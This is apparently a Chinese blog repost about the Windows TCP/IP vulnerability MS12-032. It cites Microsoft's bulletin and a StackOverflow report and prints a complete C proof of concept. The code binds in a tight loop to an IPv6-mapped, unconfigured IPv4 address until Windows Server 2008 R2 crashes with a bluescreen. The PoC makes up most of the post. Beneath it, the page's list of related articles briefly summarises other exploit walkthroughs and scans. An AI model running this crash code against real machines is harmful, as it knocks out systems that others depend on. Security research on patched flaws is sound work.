MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

最新推荐文章于 2024-09-05 13:50:10 发布
最新推荐文章于 2024-09-05 13:50:10 发布
阅读量775 收藏
点赞数
分类专栏: VC学习 渗透测试相关 文章标签: microsoft socket windows application server null
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032  


Possible MS12-032 Proof of concept from StackOverflow thx to @avivra   


We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines. 


from :
http://security-sh3ll.blogspot.com/2012/05/ms12-032-vulnerability-in-tcpip-could.html

 

// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)
#include 
#include 
#include 
#include 

#define IPV6_V6ONLY 27

void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;

wVersionRequested = MAKEWORD(2, 2);

err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}

void main()
{
MyWsaStartup();
bool bindSuccess = false;

while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}

DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}

sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);

// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;

int size = 28; // 28 is sizeof(sockaddr_in6)

int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}

Yatere
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CCIE重认证350-401
stqer的博客
01-04 2170
traffic policing: causes TCP retransmissions when traffic is dropped导致TCP重传时流量下降 introduces no delay and jitter引入无延迟和抖动 drops excessive traffic减少过多的流量 traffic shaping: buffers excessive traffic缓冲过多的流量 introduces delay and jitter引入延迟和抖动 applied on traffic t
4.9、漏洞利用 smb-RCE远程命令执行
c10udz的博客
11-12 2641
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。
MS12-032的POC
fengling132的专栏
05-10 568
微软发布了ms12-032的补丁: http://technet.microsoft.com/en-us/security/bulletin/ms12-032 这个补丁是与TCP/IP协议有关的一个栈溢出问题,可以导致本地提权,目前微软已经要求StackOverflow.com移除这些代码。 老外是这么说的,尝试绑定一个IPV6-mapped IPV4 address,目前只
Microsoft Security Bulletin MS12-020 - CriticalVulnerabilities in Remote Desktop Could Allow Remote
weixin_40191861的博客
04-11 289
see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .
MS12-020远程桌面协议RDP拒绝访问漏洞
a439017985的博客
02-24 3006
漏洞名称:MS12-020远程桌面协议RDP拒绝访问漏洞    条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。    1.nmap扫描某网段内开放3389端口的主机 nmap -vv --open -p 3389 -Pn 60.10.0.0/16 这一过程可以用其他扫描器如msscan代替> 2.利用nmap中的ms12-020脚本批
服务器2008系统提权工具,Windows下提权辅助工具Windows-Exploit-Suggester
weixin_39962341的博客
08-05 777
【51CTO.com原创稿件】一、Windows-Exploit-Suggester简介1. 简介Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,其官方下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester,它是用python开发而成,运行环境是p...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 867
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Hackthebox:Granny Walkthrough(not use metasploit)
汗的博客
12-06 1095
预备知识 nikto、nmap、iis6.0的webdav、davtest 信息收集a nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标机器 直接就是报错页面,迷惑,不过可知服务器是iis 扫了下目录,毫无思路,nmap扫下漏洞 nmap -script=vuln 10.10.10.15 还是没什么发现 nikto 扫一下,这次的信息就多了 nikto -h http://10.10.10.15 + Server: Microsoft-IIS/6.0 + Retrieved
HTB靶场系列 Windows靶机 Optimum靶机
m0_57221101的博客
01-28 2523
勘探 依然是nmap扫描 nmap 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST Nmap scan report for 10.10.10.8 Host is up (0.031s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1
SAP PP T-Code
少年休闲海
02-10 6210
事务码 描述(中英文) CNR1 Create Work Center 生成工作中心 CNR2 Change Work Center 更改工作中心 CNR3 Display Work Center 显示工作中心 CR00 Resource Planning Menu 资源计划菜单 CR01 Create Work Center 生成工作中心 CR02 Change Work Cente
用getaddrinfo()函数,通过主机名获得ipv6和ipv4的地址
yaomoon的专栏
04-16 3670
111111111111111 using the function "getaddrinfo()" to get the IP address from the hostname you provided; actually , the "getadrinfo()" function can get not only the IP address,but also more informat
sin6_addr打印:string to sockaddr_in6 and sockaddr_in6 to string
weixin_30295091的博客
03-06 1258
函式原型: #include <arpa/inet.h> const char *inet_ntop(int af, const void *src, char *dst, socklen_t size); //"network to printable" int inet_pton(int af, const char *src, void *dst); 一个...
c中in6_addr地址和修改in6_addr地址
热门推荐
代码改变世界,keep coding。
07-22 3万+
in6_addr的结构体: struct in6_addr { union { uint8_t __u6_addr8[16]; // 128 bit #if defined __USE_MISC || defined __USE_GNU uint16_t __u6_addr16[8]; // 64 bit ui
in_addr结构(sin_addr存储IP地址,使用in_addr这个数据结构)
我们一直在努力
06-25 7645
in_addr结构:The in_addr structure represents an IPv4 Internet address.typedef struct in_addr { union { struct { u_char s_b1,s_b2,s_b3,s_b4; } S_un_b; struct { u_short s_w1,s_w2;
[新闻] 微软六月九日发行十个安全补丁
微软大中华区安全博客
06-09 1348
<br />大家好,我是 Richard Chen。微软在六月九日清晨发行十个安全补丁,其中三个最高级别为严重等级,七个为重要等级。本次共修复34个漏洞,目前还没有观察到正在被利用的。<br />MS10-033 在所有支持周期内的 Windows 版本上都为严重等级,MS10-034 是 ActiveX Kill Bits 的累积性安全更新,MS10-035 是 IE 的累积性安全更新。这三个最高级别为严重等级的补丁都修复了会导致远程代码执行攻击的漏洞,请大家优先部署。<br />另外,MS10-039
linux给office权限,Microsoft Office for Mac不正确文件夹权限本地权限提升漏洞 (MS12-051)...
weixin_42511990的博客
05-02 108
发布日期:2012-07-10更新日期:2012-07-10受影响系统:Microsoft Office for Mac Office for Mac 2011不受影响系统:Microsoft Office for Mac Office 2008 for Mac描述:------------------------------------------------------------------...
全球性“微软蓝屏”事件的深思:网络安全与系统稳定性的挑战与应对
最新发布
图灵追幕者博客录
09-05 925
近日,由于微软视窗系统软件更新引发的全球性“微软蓝屏”事件,成为科技领域的热点新闻。这次事件不仅影响了全球约850万台设备,波及航空、医疗、传媒等关键行业,还导致美国超过2.3万架次航班延误。如此规模的系统中断,再次将网络安全与系统稳定性的问题推上了风口浪尖。这次事件为我们敲响了警钟,提醒我们必须更加重视网络安全和系统稳定性。那么,如何构建一个更加稳固和安全的网络环境?在网络安全和系统稳定性方面,我们应采取哪些措施?
MySQL 概率性任意密码_CVE-2012-2122: Security vulnerability in MySQL/MariaDB sql/password.c(概率性任意密码登mysql)...
06-09
这是一个关于MySQL/MariaDB的安全漏洞,被称为CVE-2012-2122。该漏洞存在于sql/password.c文件中,可以导致概率性任意密码登mysql。攻击者可以利用该漏洞通过特定的步骤创建一个恶意用户并获取访问权限,然后可以执行任意操作,包括修改或删除数据等。该漏洞已经被修复,建议所有用户尽快升级到最新版本以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值